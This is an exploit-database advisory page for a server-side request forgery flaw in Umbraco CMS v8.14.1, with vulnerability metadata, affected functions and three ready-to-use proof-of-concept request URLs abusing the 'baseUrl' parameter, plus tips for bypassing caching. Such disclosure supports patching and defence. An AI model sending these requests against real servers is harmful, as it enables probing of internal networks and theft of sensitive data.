header-logo
Suggest Exploit
vendor:
Umbraco CMS
by:
NgoAnhDuc
8.8
CVSS
HIGH
Server-Side Request Forgery (SSRF)
918
CWE
Product Name: Umbraco CMS
Affected Version From: v8.14.1
Affected Version To: v8.14.1
Patch Exists: YES
Related CWE:
CPE: a:umbraco:umbraco_cms
Metasploit:
Other Scripts:
Platforms Tested:
2021

Umbraco v8.14.1 – ‘baseUrl’ SSRF

Umbraco CMS v8.14.1 is vulnerable to Server-Side Request Forgery (SSRF) due to improper input validation of the 'baseUrl' parameter in the 'Umbraco.Web.Editors.HelpController.GetContextHelpForPage()', 'Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent()', and 'Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss()' functions. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable functions with a malicious 'baseUrl' parameter. This can allow an attacker to access internal resources, such as the local network, and potentially gain access to sensitive information.

Mitigation:

Upgrade to the latest version of Umbraco CMS v8.14.1 or later.
Source

Exploit-DB raw data:

# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
# Date: July 5, 2021
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://our.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases/8141
# Version: v8.14.1
# Affect: Umbraco CMS v8.14.1, Umbraco Cloud

Vulnerable code:

Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91

PoC:

/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=
https://SSRF-HOST.EXAMPLE/
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/

Notes:
- There's no "/" suffix in payload 1
- "/" suffix is required in payload 2 and payload 3
- "section" parameter value must be changed each exploit attempt

Navigation

Suggest Exploit

Services By CQR